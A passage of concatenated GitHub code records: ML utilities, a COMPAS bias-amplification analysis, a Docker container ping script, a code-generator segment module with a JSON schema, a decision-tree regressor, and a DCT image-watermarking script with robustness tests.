tmp_data.shape[0]) \n except:\n count_list.append(0.)\n \n out_dict = dict(zip(id_set, count_list))\n \n if do_plot:\n pd.DataFrame(out_dict, index=['feature {0}'.format(col)]).plot(kind='bar')\n plt.show()\n \n br = data[[col]].apply(pd.value_counts)/len(data[[col]])\n \n try:\n br = br.loc[bad_data].values[0]\n except:\n br = 0.\n \n print('rate of bad feature 14 is: ', br)\n \n return out_dict, br\n\n\"\"\"\npred1 = csv1['predicted_score']\npred2 = csv2['predicted_score']\npred3 = csv3['predicted_score']\nlist_of_preds = np.array([pred1, pred2, pred3]).T\n\ndef esemble(list_of_preds):\n x = np.mean(-np.log(1/list_of_preds - 1), axis=1)\n return 1 / (1 + np.exp(-x))\n\nres = esemble(list_of_preds)\nprint(res)\n\ncsv_esemble['predicted_score'] = res\ncsv_esemble.to_csv('/Users/yz/esemble_2.txt', index=False, sep=' ')\n\"\"\"\ndef esemble(list_of_preds):\n x = np.mean(-np.log(1/list_of_preds - 1), axis=1)\n return 1 / (1 + np.exp(-x))\n","repo_name":"chenyz0601/ctr-models","sub_path":"src/ctr_tensorflow/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"31419734383","text":"import matplotlib\nmatplotlib.use('Agg')\nimport pandas as pd\nimport numpy as np\nfrom sklearn import preprocessing\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\nimport pickle\nfrom sklearn import tree\nfrom sklearn.metrics import accuracy_score, precision_score, roc_auc_score\nfrom sklearn.ensemble import BaggingClassifier\nfrom responsibly.dataset import COMPASDataset\nfrom sklearn.metrics import confusion_matrix\nimport sys\nsys.path.append('..')\nfrom utils import bog_task_to_attribute, bog_attribute_to_task\n\ncompas_ds = COMPASDataset()\n\n# two_year_recid as gt, and decile_score is what judges get\ndf = compas_ds.df\n\nthresholds = []\nfps = []\nbogs = []\naa_fps = []\nc_fps = []\naa_acc = []\nc_acc = []\n\nthis_cat = 'race'\n\n#for category in ['race', 'sex']:\nfor category in [this_cat]:\n for threshold in np.arange(0, 11):\n thresholds.append(threshold)\n print(\"----{0}----{1}------\".format(category, threshold))\n categories = list(df[category].unique())\n aa_fp = None\n c_fp = None\n for cat in categories:\n indices = np.where(np.array(df[category]) == cat)[0]\n y_true, y_pred = np.array(df['two_year_recid'])[indices], np.array(df['decile_score'])[indices] > threshold\n tn, fp, fn, tp = confusion_matrix(y_true, y_pred).ravel()\n if cat in ['African-American', 'Caucasian'] and category == 'race':\n print(\"{0}: TN - {1}, FP - {2}, FN - {3}, TP - {4}\".format(cat, tn, fp, fn, tp))\n print(\"TPR - {0}, FPR - {1}, FNR - {2}\".format(tp/(tp+fn), fp/(fp+tn), fn/(fn+tp)))\n if cat == 'African-American':\n aa_fp = fp/(fp+tn)\n aa_fps.append(aa_fp)\n aa_acc.append(np.mean(y_true == y_pred))\n else:\n c_fp = fp/(fp+tn)\n c_fps.append(c_fp)\n c_acc.append(np.mean(y_true == y_pred))\n print(\"Accuracy: {}:\".format(np.mean(y_true == y_pred)))\n elif category == 'sex' and cat == 'Female':\n aa_fp = fp/(fp+tn)\n aa_fps.append(aa_fp)\n aa_acc.append(np.mean(y_true == y_pred))\n elif category == 'sex' and cat == 'Male':\n c_fp = fp/(fp+tn)\n c_fps.append(c_fp)\n c_acc.append(np.mean(y_true == y_pred))\n if category == 'race':\n fps.append(aa_fp-c_fp)\n elif category == 'sex':\n fps.append(aa_fp-c_fp)\n\n bog_tilde = np.zeros((2, len(categories)))\n bog_gt_g = np.zeros((2, len(categories)))\n for i in df['race'].keys():\n this_cat_now = categories.index(df[category][i])\n gt_o = df['two_year_recid'][i]\n pred_o = int(df['decile_score'][i] > threshold)\n bog_tilde[gt_o][this_cat_now] += 1\n bog_gt_g[pred_o][this_cat_now] += 1\n\n if category == 'race':\n bog_tilde, bog_gt_g = bog_tilde[:, 1:3], bog_gt_g[:, 1:3]\n this_bog = bog_attribute_to_task(bog_tilde, bog_gt_g)\n bogs.append(this_bog)\n\nminority = ''\nmajority = ''\nprint(\"thiscat: {}\".format(this_cat))\nif this_cat == 'race':\n minority = 'Group 1'\n majority = 'Group 2'\nelif this_cat == 'sex':\n minority = 'Female'\n majority = 'Male'\n\nfig = plt.figure(figsize=(6, 3))\nax1 = fig.add_subplot(111)\nax1.plot(thresholds, aa_fps, label='{} FPR'.format(minority), c='C0')\nax1.plot(thresholds, c_fps, label='{} FPR'.format(majority), c='C1')\nax1.set_ylabel('FPR')\nax1.set_xlabel('Threshold')\n\nax2 = ax1.twinx()\nax2.plot(thresholds, np.array(bogs), label='BiasAmp ', c='C2')\nax2.plot(thresholds, [0]*len(thresholds), '--', c='k')\nax2.set_ylabel('Bias Amplification', color='k')\nfig.legend(bbox_to_anchor=(1.15, 1.1))\nplt.tight_layout()\nplt.savefig('recidivism_thresholds.png', dpi=400)\nplt.close()\n","repo_name":"princetonvisualai/directional-bias-amp","sub_path":"compas/recidivism_classifier.py","file_name":"recidivism_classifier.py","file_ext":"py","file_size_in_byte":3857,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"67"} +{"seq_id":"38541598081","text":"import subprocess\nimport platform\n\n# Docker container names and their IPs\nips = {\n 'container1': '172.17.0.2',\n 'container2': '172.17.0.3',\n 'container3': '172.17.0.4',\n}\n\ndef ping(src_container: str, dest_ip: str) -> bool:\n \"\"\"\n Returns True if host (str) responds to a ping request from the given Docker container.\n \"\"\"\n command = ['docker', 'exec', '-it', src_container, 'ping', '-c', '1', dest_ip]\n\n return subprocess.call(command, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) == 0\n\nfor container in ips.keys():\n for ip in ips.values():\n if ips[container] != ip: # Do not ping the container itself\n result = ping(container, ip)\n print(f\"Ping from {container} to IP {ip} {'succeeded' if result else 'failed'}\")\n\n","repo_name":"nbashant/PingUseCase","sub_path":"UseCaseBot/TERMINAL_ping_containers.py","file_name":"TERMINAL_ping_containers.py","file_ext":"py","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"20911456442","text":"import json\nimport logging\nimport os\nimport shutil\n\nfrom pathlib import Path\n\nfrom jinja2 import FileSystemLoader, Environment\nfrom jsonschema import validate\nfrom munch import munchify\n\nfrom fashion.util import cd\n\n# JSON schema to validate a segment object/file.\nsegmentSchema = {\n \"definitions\": {},\n \"$schema\": \"http://json-schema.org/draft-07/schema#\",\n \"$id\": \"http://fashion.com/segment.json\",\n \"type\": \"object\",\n \"title\": \"Segment Schema\",\n \"required\": [\n \"name\",\n \"version\",\n ],\n \"properties\": {\n \"name\": {\n \"$id\": \"#/properties/name\",\n \"type\": \"string\",\n \"minLength\": 1,\n \"title\": \"Name of the segment\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"version\": {\n \"$id\": \"#/properties/version\",\n \"type\": \"string\",\n \"minLength\": 1,\n \"title\": \"Version of the segment\",\n \"default\": \"\",\n \"examples\": [\n \"1.0.0\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"description\": {\n \"$id\": \"#/properties/description\",\n \"type\": \"string\",\n \"title\": \"A description of the segment\",\n \"default\": \"\",\n \"examples\": [\n \"fashion core segment\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"templatePath\": {\n \"$id\": \"#/properties/templatePath\",\n \"type\": \"array\",\n \"title\": \"Template path list relative to segment file directory\",\n \"items\": {\n \"$id\": \"#/properties/templatePath/items\",\n \"type\": \"string\",\n \"title\": \"A template path\",\n \"default\": \"\",\n \"examples\": [\n \"./template\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n },\n \"schema\": {\n \"$id\": \"#/properties/schema\",\n \"type\": \"array\",\n \"title\": \"A list of schemas for this segment\",\n \"items\": {\n \"$id\": \"#/properties/schema/items\",\n \"type\": \"object\",\n \"title\": \"The Items Schema\",\n \"required\": [\n \"kind\",\n \"filename\"\n ],\n \"properties\": {\n \"kind\": {\n \"$id\": \"#/properties/schema/items/properties/kind\",\n \"type\": \"string\",\n \"title\": \"The Kind Schema\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core.generate.jinja2.spec\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"filename\": {\n \"$id\": \"#/properties/schema/items/properties/filename\",\n \"type\": \"string\",\n \"title\": \"The Filename Schema\",\n \"default\": \"\",\n \"examples\": [\n \"./schema/generateJinja2.json\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n }\n }\n },\n \"xformConfig\": {\n \"$id\": \"#/properties/xformConfig\",\n \"type\": \"array\",\n \"title\": \"The Xformconfig Schema\",\n \"items\": {\n \"$id\": \"#/properties/xformConfig/items\",\n \"type\": \"object\",\n \"title\": \"The Items Schema\",\n \"required\": [\n \"moduleName\",\n ],\n \"properties\": {\n \"moduleName\": {\n \"$id\": \"#/properties/xformConfig/items/properties/moduleName\",\n \"type\": \"string\",\n \"title\": \"The Modulename Schema\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core.generate.jinja2\"\n ],\n \"pattern\": \"^(.*)$\"\n },\n \"tags\": {\n \"$id\": \"#/properties/xformConfig/items/properties/tags\",\n \"type\": \"array\",\n \"title\": \"The Tags Schema\",\n \"items\": {\n \"$id\": \"#/properties/xformConfig/items/properties/tags/items\",\n \"type\": \"string\",\n \"title\": \"The Items Schema\",\n \"default\": \"\",\n \"examples\": [\n \"output\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n },\n \"parameters\": {\n \"$id\": \"#/properties/xformConfig/items/properties/parameters\",\n \"type\": \"object\",\n \"title\": \"The Parameters Schema\"\n }\n }\n }\n },\n \"segmentRefs\": {\n \"$id\": \"#/properties/segmentRefs\",\n \"type\": \"array\",\n \"title\": \"The Segmentrefs Schema\",\n \"items\": {\n \"$id\": \"#/properties/segmentRefs/items\",\n \"type\": \"string\",\n \"title\": \"A reference to another required segment\",\n \"default\": \"\",\n \"examples\": [\n \"fashion.core\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n },\n \"extraFiles\": {\n \"$id\": \"#/properties/extraFiles\",\n \"type\": \"array\",\n \"title\": \"The Extrafiles Schema\",\n \"items\": {\n \"$id\": \"#/properties/extraFiles/items\",\n \"type\": \"string\",\n \"title\": \"The Items Schema\",\n \"default\": \"\",\n \"examples\": [\n \"./model/fashionPrime.json\"\n ],\n \"pattern\": \"^(.*)$\"\n }\n }\n }\n}\n\n\ndef createDefaultXform(templatePath, targetFile, templateFile=\"defaultXformTemplate.py\", model={}):\n '''\n Create a default xform module file.\n\n :param list(string) templatePath: ordered list of search paths for template files.\n :param Path targetFile: the xform module file to write.\n :param string templateFile: the template to use to generate the xform code.\n :param dictionary model: the model passed to the xform source code generator.\n :returns: True if succeeded.\n :rtype: boolean\n '''\n if targetFile.exists():\n logging.error(\n \"xform module file already exists: {0}\".format(targetFile))\n return False\n env = Environment(loader=FileSystemLoader(templatePath))\n template = env.get_template(templateFile)\n result = template.render(model)\n try:\n targetFile.makedir(parents=True, exist_ok=True)\n except:\n pass\n with targetFile.open(mode=\"w\") as tf:\n tf.write(result)\n return True\n\n\nclass Segment(object):\n '''A collection of fashion resources.'''\n\n def __init__(self, filename):\n '''\n Initialize a new local segment.\n\n :param Path filename: the segment JSON file.\n '''\n self.properties = munchify({\n \"name\": \"local\",\n \"version\": \"1.0.0\",\n \"description\": \"fashion segment\",\n \"templatePath\": ['./template'],\n \"defaultModelPath\": './model',\n \"defaultSchemaPath\": './schema',\n \"defaultTemplatePath\": './template',\n \"defaultXformPath\": './xform',\n \"libPath\": \"./lib\",\n \"schema\": [],\n \"segmentRefs\": [\"fashion.core\"],\n \"xformConfig\": [],\n \"extraFiles\": []\n })\n self.filename = filename\n self.absFilename = self.filename.absolute()\n self.absDirname = self.absFilename.parent\n\n @staticmethod\n def load(filename):\n '''\n Load a segment description from a JSON file.\n\n :param Path filename: the location of the segment JSON file.\n :returns: the loaded Segment object.\n :rtype: Segment object\n '''\n with filename.open(mode='r') as fd:\n segment = Segment(filename)\n segment.properties = munchify(json.loads(fd.read()))\n if \"templatePath\" not in segment.properties:\n segment.properties.templatePath = []\n segment.validate()\n return segment\n\n @staticmethod\n def create(segdir, segname):\n '''\n Create a new segment.\n\n :param Path segdir: the location of the segment JSON file.\n :param string segname: the name of the segment.\n :returns: the created Segment object.\n :rtype: Segment object\n '''\n newSeg = Segment(segdir / \"segment.json\")\n newSeg.properties.name = segname\n newSeg.createDirectories()\n newSeg.save()\n return newSeg\n\n def findModuleDefinitions(self):\n xformModules = []\n with cd(self.absDirname / \"xform\"):\n for root, _, files in os.walk(\".\"):\n if os.path.basename(root) != '__pycache__':\n for file in files:\n p = Path(root) / Path(file)\n filename = Path(\"xform\") / p\n mod = [self.properties.name]\n mod.extend(p.parts[0:-1])\n mod.append(p.stem)\n modName = \".\".join(mod)\n modDef = {\n \"moduleName\": modName,\n \"filename\": str(filename.as_posix()),\n \"templatePath\": self.properties.templatePath\n }\n xformModules.append(modDef)\n return xformModules\n\n def getAbsPath(self, filename):\n '''\n Translate filename relative to this segment.\n\n :param Path filename: the relative filename to translate.\n :returns: the absolute path of the filename.\n :rtype: Path\n '''\n with cd(self.absDirname):\n return filename.absolute()\n\n def save(self):\n '''\n Save a segment description to a JSON file.\n '''\n self.validate()\n with self.absFilename.open(mode=\"w\") as sf:\n sf.write(self.properties.toJSON(indent=4))\n\n def createDirectories(self):\n '''\n Create default directories for this segment.\n '''\n self.absDirname.mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"model\").mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"schema\").mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"template\").mkdir(parents=True, exist_ok=True)\n (self.absDirname / \"xform\").mkdir(parents=True, exist_ok=True)\n\n def xformExists(self, xformName):\n '''\n Test if an xform exists in this segment.\n\n :param string xformName: name of xform to test.\n :returns: True if xform exists.\n :rtype: boolean\n '''\n filename = Path(xformName + \".py\")\n targetFile = Path(self.properties.defaultXformPath) / filename\n with cd(self.absDirname):\n return targetFile.exists()\n\n def deleteXform(self, xformName):\n '''\n Delete an xform from this segment.\n\n :param string xformName: name of xform to delete.\n '''\n filename = Path(xformName + \".py\")\n targetFile = Path(self.properties.defaultXformPath) / filename\n with cd(self.absDirname):\n if targetFile.exists():\n targetFile.unlink()\n moduleName = xformName\n modDefs = [\n x for x in self.properties.xformModules if x.moduleName != moduleName]\n self.properties.xformModules = modDefs\n moduleName = self.properties.name + \".\" + xformName\n modCfgs = [\n x for x in self.properties.xformConfig if x.moduleName != moduleName]\n self.properties.xformConfig = modCfgs\n self.save()\n\n def createXform(self, xformName, templatePath, templateFile=\"defaultXformTemplate.py\", model={}, moduleName=None):\n '''\n Create an xform module in this segment.\n\n :param string xformName: name of xform to create.\n :param list(string) templatePath: ordered list of search paths for template files.\n :param string templateFile: the template to use to generate the xform code.\n :param dictionary model: the model passed to the xform source code generator.\n :param string moduleName: the moduleName for this xform module, else default is same as xformName.\n :returns: True if succeeded.\n :rtype: boolean\n '''\n with cd(self.absDirname):\n filename = Path(xformName + \".py\")\n targetFile = Path(self.properties.defaultXformPath) / filename\n if moduleName is None:\n moduleName = filename.stem\n if not createDefaultXform(templatePath, targetFile, templateFile=templateFile, model=model):\n print(\"Failed!\")\n else:\n self.properties.xformModules.append({\n \"moduleName\": moduleName,\n \"filename\": targetFile.as_posix(),\n \"inputKinds\": [],\n \"outputKinds\": [],\n \"tags\": []\n })\n self.properties.xformConfig.append({\n \"moduleName\": self.properties.name + \".\" + moduleName,\n \"parameters\": {},\n \"tags\": []\n })\n self.save()\n return True\n\n def templateExists(self, filename):\n '''\n Test if a template exists in this segement.\n\n :param Path filename: relative filename of template file.\n :returns: True if exists.\n :rtype: boolean\n '''\n with cd(self.absDirname):\n with cd(self.properties.defaultTemplatePath):\n absDst = filename.absolute()\n return absDst.exists()\n\n def deleteTemplate(self, filename):\n '''\n Delete a template from this segment.\n\n :param Path filename: relative filename of template file.\n :returns: True if success.\n :rtype: boolean\n '''\n with cd(self.absDirname):\n with cd(self.properties.defaultTemplatePath):\n absDst = filename.absolute()\n if absDst.exists():\n absDst.unlink()\n return True\n\n def createTemplate(self, filename):\n '''\n Create a template in this segment from a file.\n\n :param Path filename: filename of template file, relative to portfolio project directory.\n :returns: True if success.\n :rtype: boolean\n '''\n absFn = filename.absolute()\n with cd(self.absDirname):\n with cd(self.properties.defaultTemplatePath):\n absDst = filename.absolute()\n try:\n absDst.parent.mkdir(parents=True, exist_ok=True)\n except:\n pass\n shutil.copy(absFn.as_posix(), absDst.as_posix())\n return True\n\n def createSchema(self, kind, schema):\n '''\n Create a JSON schema file for a model kind.\n\n :param string kind: model kind for schema.\n :param JSONobject schema: the schema for model kind.\n '''\n filename = Path(self.properties.defaultSchemaPath) / \\\n Path(kind + \".json\")\n with cd(self.absDirname):\n with filename.open(mode=\"w\") as fp:\n json.dump(schema, fp, indent=4)\n self.properties.schema.append({\n \"kind\": kind,\n \"filename\": str(filename)\n })\n self.save()\n\n def validate(self):\n '''\n Validate this Segment object against a schema.\n\n :raises: jsonschema.exceptions.ValidationError if invalid.\n '''\n validate(self.properties, segmentSchema)\n","repo_name":"braddillman/fashion","sub_path":"fashion/segment.py","file_name":"segment.py","file_ext":"py","file_size_in_byte":17450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"16227189897","text":"\r\n# -*- coding: utf-8 -*-\r\n\r\n# 引入模块\r\nfrom sklearn.tree import DecisionTreeRegressor\r\nimport pandas as pd\r\n\r\n# 读取数据\r\ntrain = pd.read_csv(\"train.csv\")\r\ntest = pd.read_csv(\"test.csv\")\r\nsubmit = pd.read_csv(\"sample_submit.csv\")\r\n\r\n\r\n\r\n#预览一下\r\nprint(train.head())\r\nprint(test.head())\r\nprint(submit.head())\r\n\r\n\r\n\r\n# 取出训练集的y\r\ny_train = train.pop('y')\r\n\r\n#building\r\nclf = DecisionTreeRegressor()\r\nclf.fit(train, y_train)\r\ny_pred = clf.predict(test)\r\n\r\n#决策树模型会依照数据的标签为每个条件进行决策分类\r\n\r\n# 输出预测结果至my_DT_prediction.csv\r\nsubmit['y'] = y_pred\r\nsubmit.to_csv('my_DT_prediction.csv', index=False)\r\n\r\n\r\nprint(\"success!\")\r\n","repo_name":"snowflowersnowflake/modelForDT_master","sub_path":"modelForDT/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"40724094608","text":"import cv2\r\nimport numpy as np\r\nfrom skimage import io, color, util, transform, filters\r\nfrom tqdm import trange\r\nimport cv2 as cv\r\nimport random\r\nfrom matplotlib import pyplot as plt\r\nfrom skimage.metrics import structural_similarity as ssim\r\n\r\n\r\ndef Arnold(img):\r\n row, col = img.shape\r\n p = np.zeros((row, col))\r\n a = 1\r\n b = 1\r\n for i in range(row):\r\n for j in range(col):\r\n x = (i + b * j) % row\r\n y = (a * i + (a * b + 1) * j) % col\r\n p[x, y] = img[i, j]\r\n return p\r\n\r\n\r\ndef dearnold(img):\r\n row, col = img.shape\r\n p = np.zeros((row, col))\r\n a = 1\r\n b = 1\r\n for i in range(row):\r\n for j in range(col):\r\n x = ((a * b + 1) * i - b * j) % row\r\n y = (-a * i + j) % col\r\n p[x, y] = img[i, j]\r\n return p\r\n\r\n\r\n# division函数由按行不动 列先动分块\r\ndef division(img):\r\n row, col = img.shape\r\n begin_r = begin_c = 0\r\n end_r = end_c = 8\r\n t = []\r\n for i in range(int(row * col / 64)):\r\n if begin_r == row:\r\n begin_r = 0\r\n end_r = 8\r\n begin_c = end_c\r\n end_c += 8\r\n block = img[begin_c:end_c, begin_r:end_r] # 二维数组切片操作 以逗号换维,第一维是行 第二维是列\r\n t.append(block)\r\n begin_r = end_r\r\n end_r += 8\r\n return t\r\n\r\n\r\ndef DCT_2D(x):\r\n '''\r\n Discrete space cosine transform\r\n x: Input matrix\r\n '''\r\n N1, N2 = x.shape\r\n X = np.zeros((N1, N2))\r\n n1, n2 = np.mgrid[0:N1, 0:N2]\r\n for w1 in range(N1):\r\n for w2 in range(N2):\r\n l1 = (2 / N1) ** 0.5 if w1 else (1 / N1) ** 0.5\r\n l2 = (2 / N2) ** 0.5 if w2 else (1 / N2) ** 0.5\r\n cos1 = np.cos(np.pi * w1 * (2 * n1 + 1) / (2 * N1))\r\n cos2 = np.cos(np.pi * w2 * (2 * n2 + 1) / (2 * N2))\r\n X[w1, w2] = l1 * l2 * np.sum(x * cos1 * cos2)\r\n return X\r\n\r\n\r\ndef iDCT2D(X, shift=True):\r\n '''\r\n Inverse discrete space cosine transform\r\n X: Input spectrum matrix\r\n '''\r\n N1, N2 = X.shape\r\n x = np.zeros((N1, N2))\r\n k1, k2 = np.mgrid[0:N1, 0:N2]\r\n l1 = np.ones((N1, N2)) * (2 / N1) ** 0.5\r\n l2 = np.ones((N1, N2)) * (2 / N2) ** 0.5\r\n l1[0] = (1 / N1) ** 0.5;\r\n l2[:, 0] = (1 / N2) ** 0.5\r\n for n1 in range(N1):\r\n for n2 in range(N2):\r\n cos1 = np.cos(np.pi * k1 * (2 * n1 + 1) / (2 * N1))\r\n cos2 = np.cos(np.pi * k2 * (2 * n2 + 1) / (2 * N2))\r\n x[n1, n2] = np.sum(l1 * l2 * X * cos1 * cos2)\r\n return x\r\n\r\n\r\n# 乘性扰动算法\r\ndef Mul_Disturbance(DCT_list, Watermark):\r\n # DCT_list.astype(float) # 第34个矩阵本应减小却增大 //0 为该处的像素值\r\n list_DCT_Mul = []\r\n a = 0.01 # 论文为0.04\r\n row, col = Watermark.shape\r\n z = 0\r\n for i in range(col):\r\n for j in range(row):\r\n if Watermark[i][j] == 0:\r\n list_DCT_Mul.append(DCT_list[z] * (1 - a))\r\n else:\r\n list_DCT_Mul.append(DCT_list[z] * (1 + a))\r\n z += 1\r\n return list_DCT_Mul\r\n\r\n\r\ndef Merge(Carrier, iDCT_list):\r\n row, col = Carrier.shape\r\n begin_r = begin_c = 0\r\n end_r = end_c = 8\r\n for i in range(len(iDCT_list)):\r\n if begin_r == row:\r\n begin_r = 0\r\n end_r = 8\r\n begin_c = end_c\r\n end_c += 8\r\n Carrier[begin_c:end_c, begin_r:end_r] = iDCT_list[i]\r\n begin_r = end_r\r\n end_r += 8\r\n\r\n\r\n# 水印提取是水印嵌入的逆过程\r\ndef WaterMark_extract(Carrier_R, Carrier_DCT): # 传参时候传入list 和 Carrier_DCT\r\n list_extract = []\r\n WaterMark = np.zeros((32, 32))\r\n block1 = np.zeros((8, 8), dtype='float')\r\n block2 = np.zeros((8, 8), dtype='float')\r\n block_original = np.zeros((8, 8))\r\n block_extract = np.zeros((8, 8))\r\n # 先进行分块\r\n list_original = division(Carrier_R)\r\n list_extract = division(Carrier_DCT)\r\n # 分别进行DCT变换\r\n for i in trange(len(list_original)):\r\n # list_extract[i] = DCT_2D(list_extract[i])\r\n # list_original[i] = DCT_2D(list_original[i])\r\n block1 = list_original[i]\r\n block2 = list_extract[i]\r\n list_original[i] = cv.dct(block1)\r\n list_extract[i] = cv.dct(block2)\r\n # 通过比较原图像与嵌入后的数值大小来判断水印值\r\n j = k = 0\r\n for i in range(len(list_original)):\r\n block_original = list_original[i]\r\n block_extract = list_extract[i]\r\n if block_original[0][0] < block_extract[0][0]:\r\n WaterMark[j][k] = 1 # 这里应该是1\r\n else:\r\n WaterMark[j][k] = 0 # 这里应该是0\r\n k += 1\r\n if k == 32:\r\n k = 0\r\n j += 1\r\n # Arnold 逆变换\r\n for i in range(10):\r\n WaterMark = dearnold(WaterMark)\r\n return WaterMark\r\n\r\n\r\ndef crop(img, a, b, x, y):\r\n ''' \r\n :param a: 裁剪行起始位置\r\n :param b: 裁剪行终止位置\r\n :param x: 裁剪列起始位置\r\n :param y: 裁剪列终止位置\r\n :return: 裁剪后的图像\r\n '''\r\n row, col = img.shape\r\n crop_image = np.zeros((row, col))\r\n for i in range(col):\r\n for j in range(row):\r\n crop_image[i,j] = img[i,j]\r\n i = x\r\n j = a\r\n while i < y:\r\n while j < b:\r\n crop_image[i][j] = 255\r\n j += 1\r\n i += 1\r\n j = a\r\n return crop_image\r\n\r\n\r\ndef light_change(image, a):\r\n '''\r\n\r\n :param img: 载体图像\r\n :param a: 亮度变化系数\r\n :return: 改变后的图像\r\n '''\r\n row, col = image.shape\r\n for j in range(row):\r\n for i in range(col):\r\n image[i, j] = image[i, j] * a\r\n return image\r\n\r\ndef sp_noise(image,prob):\r\n\r\n '''\r\n 添加椒盐噪声\r\n prob:噪声比例\r\n '''\r\n\r\n output = np.zeros(image.shape,np.uint8)\r\n thres = 1 - prob\r\n\r\n for i in range(image.shape[0]):\r\n for j in range(image.shape[1]):\r\n rdn = random.random()\r\n if rdn < prob:\r\n output[i][j] = 0\r\n elif rdn > thres:\r\n output[i][j] = 255\r\n else:\r\n output[i][j] = image[i][j]\r\n\r\n return output\r\n\r\n\r\nCarrier = io.imread('d:/python实例/imgProcess/DCTimg/lena_color_256.tif') # 256 256 3\r\n\r\n# 分割RGB图像为三个通道\r\nCarrier_R = Carrier[:, :, 0]\r\nCarrier_G = Carrier[:, :, 1]\r\nCarrier_B = Carrier[:, :, 2]\r\n\r\nWaterMark = io.imread('D:/python实例/imgProcess/DCTimg/hide.jpg') # 其变成32 32\r\nWaterMark = cv2.resize(WaterMark, None, fx=0.5, fy=0.5, interpolation=cv2.INTER_CUBIC)\r\nCarrier_R = Carrier_R.astype(dtype='float')\r\nWaterMark = color.rgb2gray(WaterMark) # 32 32\r\nret, WaterMark = cv.threshold(WaterMark, 0.5, 1, cv2.THRESH_BINARY)\r\n# plt.imshow(WaterMark,cmap='gray')\r\n# plt.figure()\r\n\r\n# 分割为8*8的block矩阵\r\nlist = division(Carrier_R)\r\n#\r\n#\r\n# 自己的离散余弦变换\r\nlist_DCT = []\r\nblock = np.zeros((8, 8), dtype='float')\r\nfor i in trange(len(list)):\r\n # list_DCT.append(DCT_2D(list[i]))\r\n block = list[i]\r\n list_DCT.append(cv2.dct(block))\r\n\r\n# Arnold变换\r\nfor i in range(10):\r\n WaterMark = Arnold(WaterMark)\r\n\r\n# 乘性扰动\r\nlist_DCT_Mul = []\r\nlist_DCT_Mul = Mul_Disturbance(list_DCT, WaterMark)\r\n\r\n# 离散余弦反变换\r\nlist_iDCT = []\r\nfor i in trange(len(list_DCT_Mul)):\r\n # list_iDCT.append(iDCT2D(list_DCT_Mul[i])) # list_iDCT放置的是经过乘性扰动后的反余弦变换矩阵 大小8*8\r\n block = list_DCT_Mul[i]\r\n list_iDCT.append(cv.idct(block))\r\n\r\nrow, col = Carrier_R.shape\r\nCarrier_DCT = np.zeros((row, col), dtype='float32')\r\nMerge(Carrier_DCT, list_iDCT) # 当前Carrier_DCT中存放着嵌入水印后的矩阵\r\n\r\n# Carrier_DCT = Carrier_DCT.astype('')\r\n# 添加噪声\r\n\r\n# 添加高斯噪声\r\n# mean = 0\r\n# sigma = 6\r\n# gauss = np.random.normal(mean, sigma, (row, col))\r\n# image_gaussian = Carrier_DCT + gauss\r\n# image_gaussian = np.clip(image_gaussian, a_min=0, a_max=255)\r\n# plt.imshow(image_gaussian, cmap='gray')\r\n\r\n# 添加椒盐噪声\r\n# image_sp = sp_noise(Carrier_DCT,0.001)\r\n# image_sp = image_sp.astype('float')\r\n# plt.imshow(image_sp,cmap='gray')\r\n\r\n# 旋转处理(30°)\r\n# image_spin = transform.rotate(Carrier_DCT, 5)\r\n# plt.imshow(image_spin,cmap='gray')\r\n# #\r\n# # 裁剪处理\r\nimage_crop = crop(Carrier_DCT,70,150,70,150)\r\n# plt.imshow(image_crop,cmap='gray')\r\n#\r\n# 裁边攻击\r\n#\r\n# 锐化处理,采用拉普拉斯算子\r\n# img_laplace = filters.laplace(Carrier_DCT,ksize=3 ,mask=None)\r\n# img_enhance = Carrier_DCT + img_laplace\r\n# plt.imshow(img_enhance,cmap='gray')\r\n#\r\n#\r\n#\r\n# plt.imshow(Carrier_DCT,cmap='gray')\r\n# plt.figure()\r\n#\r\n# 提取水印图像\r\nWaterMark = WaterMark_extract(Carrier_R, Carrier_DCT)\r\n# plt.imshow(WaterMark, cmap='gray')\r\n\r\n# 高斯噪声水印提取\r\n# WaterMark_gaussian = WaterMark_extract(Carrier_R,image_gaussian)\r\n# print(ssim(WaterMark,WaterMark_gaussian))\r\n# plt.imshow(WaterMark_gaussian,cmap='gray')\r\n\r\n#\r\n# # 椒盐噪声水印提取\r\n# WaterMark_sp = WaterMark_extract(Carrier_R,image_sp)\r\n# print(ssim(WaterMark,WaterMark_sp))\r\n# plt.imshow(WaterMark_sp,cmap='gray')\r\n# plt.figure()\r\n# #\r\n# # 泊松噪声\r\n# WaterMark_poisson = WaterMark_extract(Carrier_R,image_sp)\r\n# plt.imshow(WaterMark_poisson,cmap='gray')\r\n# plt.figure()\r\n#\r\n# # 旋转操作\r\n# WaterMark_spin = WaterMark_extract(Carrier_R,image_spin)\r\n# plt.imshow(WaterMark_spin,cmap='gray')\r\n\r\n#\r\n# # 裁剪操作\r\nWaterMark_crop =WaterMark_extract(Carrier_R,image_crop)\r\nprint(ssim(WaterMark,WaterMark_crop))\r\nplt.imshow(WaterMark_crop,cmap='gray')\r\n# plt.figure()\r\n#\r\n# # 锐化处理\r\n# WaterMark_laplace = WaterMark_extract(Carrier_R,img_laplace)\r\n# plt.imshow(WaterMark_laplace,cmap='gray')\r\n# 